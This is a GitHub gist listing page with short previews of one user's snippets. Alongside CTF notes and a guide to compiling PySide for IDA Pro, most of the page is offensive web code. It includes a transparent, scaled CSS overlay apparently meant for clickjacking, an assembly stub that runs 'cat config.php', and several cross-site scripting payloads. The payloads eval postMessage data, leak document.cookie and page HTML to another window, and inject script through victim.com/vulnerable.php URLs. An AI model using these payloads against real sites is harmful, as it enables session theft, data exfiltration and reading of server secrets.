Skip to content

Instantly share code, notes, and snippets.

@ancat
ancat / gist:11164179
Created April 22, 2014 03:09
"obfuscated" html
<style>
.like{
position:absolute;
-moz-transform: scale(2,1);
-webkit-transform: scale(2,1);
-ms-transform: scale(2,1);
opacity:.0;
top:18%;
left:27%;
}
@ancat
ancat / notes.md
Created March 3, 2014 01:23
z3 for ctf
@ancat
ancat / pyside.md
Last active March 10, 2017 09:41
Compiling PySide for IDA Pro on Windows

Compiling PySide for IDA Pro on Windows

If you've ever wanted to use IDA's native GUIs, you'll need PySide. Unfortunately PySide is annoying to compile, and the only available binaries are for Python 2.6. This should work for any version.

Note: The python module installer executable at the end of this guide did not work for me. The compiled pyd and dll files, however were completely usable from within IDA.

Prequisites

  • Visual Studio 2010
  • Visual Studio 2010 Service Pack 1
section .data
cmd:
db "cat config.php", 10
section .text
global _start
extern system
_start:
push cmd
<script>
window.addEventListener('message', function(e) {eval(e.data)}, false);
</script>
<script>
window.top.postMessage(document.cookie, '*');
</script>
<script>
window.addEventListener(
'message',
function(e) {
window.top.postMessage(
function() {var x=new XMLHttpRequest();x.open('GET',e.data,false);x.send();return x.responseText}(), '*'
)
},
false);
</script>
<script>
var w = window.open("http://www.victim.com/vulnerable.php?string=<script>window.addEventListener('message', function(e) {eval(e.data);}, false)</script>", "somewindow");
w.postMessage("window.opener.postMessage(document.body.innerHTML, '*')", "*");
</script>
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(function() {var x=new XMLHttpRequest();x.open('GET','/other/page.html',false);x.send();return x.responseText}(), '*')</script>
http://victim.com/vulnerable.php?string=<script>window.top.postMessage(document.body.innerHTML, '*')</script>